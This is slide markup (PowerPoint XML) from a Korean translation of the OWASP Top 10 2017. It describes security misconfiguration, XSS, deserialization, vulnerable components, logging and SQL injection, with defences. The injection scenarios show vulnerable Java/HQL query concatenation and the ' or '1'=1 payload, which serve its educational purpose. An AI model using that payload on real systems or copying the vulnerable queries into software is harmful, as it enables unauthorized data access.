            <a:ext cx="5218177" cy="7435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잘못된 보안 구성은 가장 흔하게 보이는 이슈입니다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취약한 기본 설정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미완성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(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또는 임시 설정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),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개방된 클라우드 스토리지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잘못 구성된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HTTP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헤더 및 민감한 정보가 포함된 장황한 에러 메시지로 인한 결과입니다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모든 운영체제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프레임워크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라이브러리와 애플리케이션을 안전하게 설정해야 할 뿐만 아니라 시기 적절하게 패치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/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업그레이드를 진행해야 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A858E023-0889-4FE9-9B01-62527B94C07F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="5031000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E4E0F83D-B235-48A5-A352-7B6BBC2BAE17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="5829460"/>
            <a:ext cx="5218177" cy="7578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XSS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취약점은 애플리케이션이 올바른 유효성 검사 또는 필터링 처리 없이 새 웹 페이지에 신뢰할 수 없는 데이터를 포함하거나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자바스크립트와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HTML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을 생성하는 브라우저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를 활용한 사용자 제공 데이터로 기존 웹 페이지를 업데이트할 때 발생합니다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XSS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는 피해자의 브라우저에서 공격자에 의해 스크립트를 실행시켜 사용자 세션을 탈취할 수 있게 만들고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웹 사이트를 변조시키고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악성 사이트로 리다이렉션할 수 있도록 허용합니다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AC128063-7A66-4F34-A720-2EAB6E988467}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="5833981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A7:2017-</a:t>
            </a:r>
            <a:b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크로스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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사이트 스크립팅 </a:t>
            </a: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(</a:t>
            </a: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XSS)</a:t>
            </a:r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3E895283-6404-4647-9AED-A7928C930CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="6654258"/>
            <a:ext cx="5218177" cy="6999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안전하지 않은 역직렬화는 종종 원격 코드 실행으로 이어집니다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역직렬화 취약점이 원격 코드 실행 결과를 가져오지 않더라도 이는 권한 상승 공격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주입 공격과 재생 공격을 포함한 다양한 공격 수행에 사용될 수 있습니다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 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0"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1770D43A-73DB-44C0-AF41-71E9A314BA2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="6636962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A8:2017-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안전하지 않은 역직렬화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1D3ABA2A-B6B4-4A1F-B3F6-D4C323A211D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="7442666"/>
            <a:ext cx="5218177" cy="716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라이브러리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프레임워크 및 다른 소프트웨어 모듈 같은 컴포넌트는 애플리케이션과 같은 권한으로 실행됩니다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만약에 취약한 컴포넌트가 악용된 경우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이는 심각한 데이터 손실을 일으키거나 서버가 장악됩니다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알려진 취약점이 있는 컴포넌트를 사용한 애플리케이션과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API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는 애플리케이션 방어를 약화시키거나 다양한 공격과 영향을 주게 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 </a:t>
            </a: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591F4221-9110-4B57-9D5B-633059706604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75186" y="7435423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A9:2017-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알려진 취약점이 있는 구성요소 사용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49216BAC-D272-467A-B5B1-631A0C551A99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488437" y="8240115"/>
            <a:ext cx="5218177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불충분한 로깅과 모니터링은 사고 대응의 비효율적인 통합 또는 누락과 함께 공격자들이 시스템을 더 공격하고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지속성을 유지하며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더 많은 시스템을 중심으로 공격할 수 있도록 만들고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데이터를 변조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추출 또는 파괴할 수 있습니다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.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대부분의 침해 사례에서 침해를 탐지하는 시간이 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200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일이 넘게 걸리는 것을 보여주고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>이는 일반적으로 내부 프로세스와 모니터링보다 외부 기관이 탐지합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" kern="1200" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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AD39F83D-88CC-4839-86E9-886E3E768699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75185" y="8240115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  <a:t>A10:2017-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1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불충분한 로깅 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>모니터링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34A99-A6CF-4DF0-BB88-4F315BF4201A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="66368" y="5158509"/>
            <a:ext cx="14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  <a:t>A6:2017-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>잘못된 보안 구성</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr 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263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6400800"/>
            <a:ext cx="3383280" cy="2743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공격 시나리오 예제</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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lvl="0">
              <a:spcBef>
                <a:spcPts val="3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시나리오 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>애플리케이션은 다음과 같은 취약한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>호출 구조에서 신뢰되지 않은 데이터를 사용합니다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 String query = "SELECT * FROM accounts WHERE</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="850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</a:b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5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custID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 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="85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request.getParameter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("id") + "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</a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="5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시나리오 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>마찬가지로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프레임워크에 대한 애플리케이션의 맹목적인 신뢰는 여전히 취약한 쿼리를 초래합니다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500"/>
              </a:spcBef>
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>예시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en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hibernate Query Language (HQL)):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 Query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="850" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>HQLQuery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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="850" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>session.createQuery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("FROM accounts</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Exo 2"/>
                <a:sym typeface="Exo 2"/>
              </a:rPr>
            </a:b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  WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="850" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>custID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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8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" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="850" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>request.getParameter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("id") + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8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+mn-ea"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="5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두 개의 사례로 보아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공격자는 브라우저에서 전송할 ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파라미터 값을 수정합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: ‘ or ‘1’=1. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="5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예제</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: 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 http://example.com/app/accountView?id=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85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1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="5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이렇게 하면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두 쿼리의 의미가 변경되어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accounts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>테이블의 모든 레코드가 반환됩니다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  <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>더 위험한 공격은 저장 프로시저의 데이터를 수정하거나 파괴합니다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3125418"/>
            <a:ext cx="3383400" cy="3150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취약점 확인 방법</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="14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sz="2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애플리케이션은 아래와 같은 경우 공격에 취약합니다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사용자 제공 데이터가 유효하지 않거나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필터링 되어지지 않거나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애플리케이션에 의해 정제되지 않습니다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상황 인식 기반 필터링 없이 동적 쿼리나 매개 변수화 되지 않은 호출이 인터프리터에서 직접 사용됩니다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악의적인 데이터가 객체 관계형 매핑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(ORM) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>검색 매개 변수 내에서 사용되어 추가로 민감한 정보를 추출합니다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악의적인 데이터가 직접적으로 동적 쿼리 안에 포함된 구조적 데이터와 악의적 데이터를 포함한 명령어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일반 명령어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, SQL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>저장 프로시저에 사용되거나 연결됩니다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1270" lvl="0" indent="-71120">
              <a:lnSpc>
                <a:spcPct val="111111"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buSzPct val="122222"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>보다 일반적으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NoSQL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운영체제 명령어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, ORM(Object Relational Mapping), LDAP, EL(Expression Languages), OGNL(Object Graph Navigation Library) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>인젝션이 있습니다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  <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 개념은 모든 인터프리터 간에 동일합니다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  <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>애플리케이션이 인젝션에 취약한지 판별하기 위해선 소스코드를 리뷰하는 것과 더불어 모든 파라미터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헤더</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, URL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>쿠키</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, JSON, SOAP, XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>데이터 입력에 대한 철저한 자동화 테스트가 가장 좋은 방법입니다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  <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>기관은 정적 애플리케이션 보안 테스트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>SAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>와 동적 애플리케이션 테스트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>DAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>툴을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CI/CD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>파이프라인에 포함시켜 새로운 인젝션 결합을 운영 시스템 배포 전에 발견할 수 있습니다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97" name="Shape 297"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="6400800"/>
            <a:ext cx="3383280" cy="2743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참조문서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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altLang="ko-KR" sz="2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en-US" altLang="ko-KR" sz="770" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Exo 2"/>
                <a:sym typeface="Exo 2"/>
              </a:rPr>
              <a:t>OWASP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OWASP Proactive Controls: Parameterize Queries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OWASP ASVS: V5 Input Validation and Encoding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OWASP Testing Guide: SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="77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Command Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="77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-US" sz="77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ORM injection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OWASP Cheat Sheet: Injection Prevention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OWASP Cheat Sheet: SQL Injection Prevention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OWASP Cheat Sheet: Injection Prevention in Java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OWASP Cheat Sheet: Query Parameterization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OWASP Automated Threats to Web Applications – OAT-014</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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ko-KR" altLang="en-US" sz="770" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Exo 2"/>
                <a:sym typeface="Exo 2"/>
              </a:rPr>
              <a:t>외부자료</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="770" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Exo 2"/>
              <a:sym typeface="Exo 2"/>
            </a:endParaRP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CWE-77: Command Injection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CWE-89: SQL Injection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CWE-564: Hibernate Injection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CWE-917: Expression Language Injection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77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PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="77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: Server-side template injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="77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0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74720" y="3117013"/>
            <a:ext cx="3383400" cy="3150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46800" bIns="36000" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/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15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보안 대책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="15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 indent="-69850">
              <a:lnSpc>
                <a:spcPct val="111111"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buSzPct val="122222"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>인젝션을 예방하기 위해서는 데이터를 지속적으로 명령어와 쿼리로부터 분리시켜야 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.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Char char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>기본 옵션은 인터프리터 사용을 피하거나 매개변수화된 인터페이스를 제공하는 안전한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 사용하거나 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ORMs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>툴을 사용하도록 마이그레이션 하는 것입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>주의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>매개변수화 된 경우에도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PL/SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이나 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>T-SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>과 데이터</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>쿼리가 연결되거나 악의적인 데이터가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="830" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EXECUTE IMMEDIATE </a:t>
            </a:r>
            <a:r>
